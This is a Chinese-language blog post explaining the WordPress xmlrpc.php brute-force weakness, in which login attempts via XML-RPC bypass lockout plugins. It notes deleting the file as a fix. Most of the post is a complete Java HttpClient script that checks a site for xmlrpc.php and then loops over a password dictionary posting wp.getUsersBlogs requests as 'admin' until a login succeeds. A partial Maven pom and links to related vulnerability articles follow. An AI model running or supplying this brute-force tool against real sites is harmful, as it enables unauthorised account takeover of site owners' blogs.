Wordpress xmlrpc.php暴力破解漏洞
2014-08-02 00:00
309 查看
Wordpress xmlrpc.php暴力破解漏洞
wordpress是很流行的开源博客,它提供远程发布文章的方法,就是使用跟路径的xmlrpc.php这个文件,最近爆出xmlrpc漏洞,漏洞原理是通过xmlrpc进行认证,即使认证失败,也不会被Wordpress安装的安全插件记录,所以不会触发密码输错N次被锁定的情况。因此就可能被暴力破解,如果密码又是弱口令的话,就相当危险了。最简单的解决办法,就是删除xmlrpc.php[b]这个文件。闲来无事,用java写了暴力破解的脚本,其实就是拿着各种用户名、密码去不断调用xmlrpc.phpp[/b]这个文件,检测认证结果,很简单。只为娱乐,暴力破解的事情,大家慎重。Xmlrpc.java源码如下:
package com.yeetrack.security.wordpress;
import org.apache.http.client.ClientProtocolException;
import org.apache.http.client.config.RequestConfig;
import org.apache.http.client.methods.CloseableHttpResponse;
import org.apache.http.client.methods.HttpGet;
import org.apache.http.client.methods.HttpPost;
import org.apache.http.entity.StringEntity;
import org.apache.http.impl.client.CloseableHttpClient;
import org.apache.http.impl.client.HttpClients;
import org.apache.http.util.EntityUtils;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.testng.annotations.Test;
import java.io.*;
/**
* Created by victor wang on 2014/8/2.
* 利用wordpress xmlrpc漏洞,暴力破解密码
*/
public class Xmlrpc
{
private String userAgent = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0";
RequestConfig requestConfig = RequestConfig.custom().setConnectionRequestTimeout(4000).setConnectTimeout(4000)
.setSocketTimeout(4000).build();
private static Logger logger = LoggerFactory.getLogger(Xmlrpc.class);
private CloseableHttpClient httpClient = HttpClients.custom()
.setUserAgent(userAgent)
.setDefaultRequestConfig(requestConfig)
.build();
/**
* 校验域名是否存在xmlrpc.php这个文件
*/
private boolean checkXmlRpcFile(String domain)
{
domain = wrapperUrl(domain);
if(domain==null)
return false;
HttpGet get = new HttpGet("http://"+domain+"/xmlrpc.php");
get.addHeader("User-Agent", userAgent);
CloseableHttpResponse response = null;
String resultString = null;
try {
response = httpClient.execute(get);
if(null == response || response.equals(""))
return false;
resultString = EntityUtils.toString(response.getEntity());
} catch (IOException e) {
e.printStackTrace();
}
return resultString.contains("XML-RPC server accepts POST requests only.");
}
/**
* 暴力尝试
*/
private boolean forceLogin(String username, String password, String url)
{
//尝试登录
HttpPost post = new HttpPost("http://"+wrapperUrl(url)+"/xmlrpc.php");
post.addHeader("User-Agent", userAgent);
String xmlString = "<?xml version=\"1.0\" encoding=\"iso-8859-1\"?><methodCall> <methodName>wp.getUsersBlogs</methodName> <params> <param><value>"+username+"</value></param> <param><value>"+password+"</value></param> </params></methodCall>";
StringEntity entity = null;
try {
entity = new StringEntity(xmlString);
post.setEntity(entity);
CloseableHttpResponse response = httpClient.execute(post);
String loginResult = EntityUtils.toString(response.getEntity());
if(null== loginResult || loginResult.equals(""))
return false;
if(loginResult.contains("isAdmin")) {
logger.info(url + "登录成功,userename--->" + username + " password--->" + password);
return true;
}
} catch (UnsupportedEncodingException e) {
e.printStackTrace();
} catch (ClientProtocolException e) {
e.printStackTrace();
} catch (IOException e) {
e.printStackTrace();
}
return false;
}
/**
* 净化url,去掉http://或者末尾的path
*/
private String wrapperUrl(String url)
{
if(null == url || url.equals(""))
return null;
if(url.startsWith("http://"))
url = url.substring(7);
if(url.contains("/"))
url = url.substring(0, url.indexOf("/"));
return url;
}
/**
* 破解
*/
@Test
public void test()
{
String url = "http://somewordpress.com/xmlrpc.php";
if(!checkXmlRpcFile(url)) {
logger.info(url+"--->不存在xmlrpc漏洞");
return;
}
File file = new File("src/main/resources/1pass00.txt"); //密码字典,这个网上一堆一堆的,或者自己生成也可
try {
FileReader fileReader = new FileReader(file);
BufferedReader bufferedReader = new BufferedReader(fileReader);
String line = null;
int count = 1;
while ((line = bufferedReader.readLine()) != null) {
System.out.println("" + count + " " + line);
if(forceLogin("admin", line, url))
break;
count++;
//Thread.sleep(500);
}
} catch (Exception e) { e.printStackTrace(); }
}
}项目使用maven管理,使用了apache的httpclient和log4j,pom.xml代码如下:
<?xml version="1.0" encoding="UTF-8"?> <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"> <modelVersion>4.0.0</modelVersion> <groupId>com.yeetrack.security</groupId> <artifactId>wordpress-xmlrpc</artifactId> <version>1.0-SNAPSHOT</version>
继续阅读-->
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- 防止WordPress利用xmlrpc.php进行暴力破解以及DDoS
- WordPress存在DoS拒绝服务漏洞,推荐删除根目录下的xmlrpc.php
- 【运维小分享】记个人博客网站受针对xmlrpc.php的暴力破解攻击
- WordPress 3.8.1 /xmlrpc.php拒绝服务漏洞
- wordpress优化禁用xml-rpc,删除xmlrpc.php防止暴力破解
- WordPress ADIF Log Search Widget 插件‘logbook_search.php’跨站脚本漏洞
- WordPress NextGEN Gallery ‘upload.php’任意文件上传漏洞
- WordPress Contact Form插件‘contact_form.php’跨站脚本漏洞
- WordPress Count Per Day插件‘counter.php’跨站请求伪造漏洞
- PHP安全编程:暴力破解攻击
- WordPress RokIntroScroller插件‘thumb.php’多个安全漏洞
- WordPress WP Cleanfix插件‘wpCleanFixAjax.php’远程PHP代码执行漏洞
- C#调用WordPress的xmlrpc.php远程发布文章
- WordPress Bradesco Gateway插件‘falha.php’跨站脚本漏洞
- WordPress /wp-admin/includes/post.php user_ID 参数操作权限提升漏洞
- WordPress RokNewsPager插件‘thumb.php’多个安全漏洞
- WordPress /wp-admin/users.php畸形s参数路径泄漏漏洞
- WordPress organizer/page/users.php脚本多个跨站脚本漏洞
- 几种解决Windows Live Writer不能读取WordPress文章的xmlrpc.php错误的方法
- WordPress User Photo ‘user-photo.php’任意文件上传漏洞